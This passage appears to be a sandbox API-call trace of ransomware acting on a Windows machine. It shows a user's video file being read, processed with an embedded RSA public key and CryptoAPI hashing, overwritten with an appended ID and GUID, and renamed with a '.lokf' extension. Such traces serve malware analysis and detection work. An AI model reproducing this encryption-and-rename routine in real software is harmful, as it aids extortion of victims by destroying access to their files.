Cm9nOn1JJtRb93m\\4C47 OYV277RnlFF.avi") returned=".avi" [0060.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\4C47 OYV277RnlFF.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\4c47 oyv277rnlff.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.573] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=75858) returned 1 [0060.573] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.576] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1282c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.576] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.576] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.577] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.577] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.577] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x12852, lpOverlapped=0x0) returned 1 [0060.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.577] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.577] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.577] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8478) returned 1 [0060.578] CryptCreateHash (in: hProv=0x6b8478, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.578] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.578] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.578] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.578] GetLastError () returned 0x0 [0060.578] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.578] CryptReleaseContext (hProv=0x6b8478, dwFlags=0x0) returned 1 [0060.578] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.578] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.578] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.578] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.578] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x12850) returned 0x9c8bae8 [0060.579] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89640 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ec0 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89688 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ed8 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f08 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f20 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.579] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f08 | out: hHeap=0x660000) returned 1 [0060.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f20 | out: hHeap=0x660000) returned 1 [0060.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f20 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85f08 [0060.579] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f20 | out: hHeap=0x660000) returned 1 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f08 | out: hHeap=0x660000) returned 1 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.580] GetCurrentThreadId () returned 0x9e0 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8b0f0 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8478 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.580] GetCurrentThreadId () returned 0x9e0 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.580] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85f08 [0060.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f20 [0060.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.581] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85ef0 [0060.581] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f38 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f08 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85f08 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f08 | out: hHeap=0x660000) returned 1 [0060.582] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.583] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8478 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f38 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85f20 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ef0 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ed8 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c89688 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.584] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x1284d, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x1284d, lpOverlapped=0x0) returned 1 [0060.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.584] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12852, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.584] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0060.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.584] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.584] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.584] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.584] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.584] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.585] CloseHandle (hObject=0x5cc) returned 1 [0060.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.586] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.586] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0060.586] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\4C47 OYV277RnlFF.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\4c47 oyv277rnlff.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\m Cm9nOn1JJtRb93m\\4C47 OYV277RnlFF.avi.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\m cm9non1jjtrb93m\\4c47 